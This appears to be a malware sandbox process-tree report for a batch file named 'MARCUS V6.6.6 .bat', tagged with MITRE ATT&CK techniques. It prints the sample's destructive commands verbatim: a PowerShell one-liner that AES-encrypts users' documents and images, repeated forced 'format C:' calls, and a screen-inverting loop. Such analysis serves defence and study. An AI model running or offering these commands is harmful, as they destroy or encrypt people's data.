        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6728
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6856
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6992
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7132
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6576
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6976
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6964
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7304
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7472
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7624
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7752
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7892
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8028
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8160
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7268
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7736
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8112
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7720
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8212
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8344
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8476
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8604
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8736
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8864
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9000
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9148
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8308
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:7968
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious use of AdjustPrivilegeToken
          PID:9020
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8584
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:8716
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9320
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9452
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9596
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9764
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9904
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:10032
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:10164
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9416
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9756
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:10160
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:9392
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:10268
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:10400
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          PID:10528
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          PID:10664
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          PID:10804
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          PID:10936
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          PID:11068
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          PID:11204
            C:\Windows\system32\wermgr.exe
              "C:\Windows\system32\wermgr.exe" "-outproc" "0" "11204" "1876" "1792" "1880" "0" "0" "1884" "0" "0" "0" "0" "0"
              - Checks processor information in registry
              - Enumerates system info in registry
              PID:10384
C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
  PID:9584
    C:\Windows\system32\chcp.com
      chcp 1250
      PID:10396
    C:\Windows\system32\mode.com
      mode 85,30
      PID:11108
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "$klucz=New-Object Byte[] 32; (New-Object Security.Cryptography.RNGCryptoServiceProvider).GetBytes($klucz); ls C:\Users -Recurse -Include *.doc,*.xls,*.jpg | % { [IO.File]::WriteAllBytes($_.FullName+'.MAGNUS', (New-Object Security.Cryptography.AesManaged).CreateEncryptor().TransformFinalBlock([IO.File]::ReadAllBytes($_),0,$_.Length) }"
      PID:11256
C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Checks SCSI registry key(s)
  PID:3800

C:\Windows\system32\werfault.exe
  werfault.exe /h /shared Global\cdffd5b55a98432da6ea9da6b95c1e9d /t 3912 /p 4436
  PID:1568
C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:472
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff2496dcf8,0x7fff2496dd04,0x7fff2496dd10
      PID:9072
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:2
      PID:9192
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1644,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2212 /prefetch:3
      PID:7724
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2436,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2604 /prefetch:8
      PID:2272
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
      PID:6048
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:1
      PID:6056
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3844 /prefetch:2
      PID:4216
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4732,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:1
      PID:6812

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  PID:8316
C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
  PID:7248
    C:\Windows\system32\chcp.com
      chcp 1250
      PID:8020
    C:\Windows\system32\mode.com
      mode 85,30
      PID:7200
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      PID:7264
    C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      PID:7596
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      PID:7856
    C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      PID:7792
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      PID:7424
    C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      PID:8176
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      PID:7612
    C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      PID:6304
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      PID:8132
    C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      PID:7288
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
      PID:8396
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aj035jz\0aj035jz.cmdline"
          PID:8756
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
  PID:8884
    C:\Windows\system32\chcp.com
      chcp 1250
      PID:9032
    C:\Windows\system32\mode.com
      mode 85,30
      PID:9052
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
      PID:9144
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige4gybm\ige4gybm.cmdline"
          PID:9376
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"1⤵PID:9324
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:9524
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9668
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9840
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10232
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10228
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9288
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9556
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10196
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4980
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9996
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:9820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:9316
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10324
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10312
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10344
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10996
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:10616
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:10656
-
Network
MITRE ATT&CK Enterprise v16
Downloads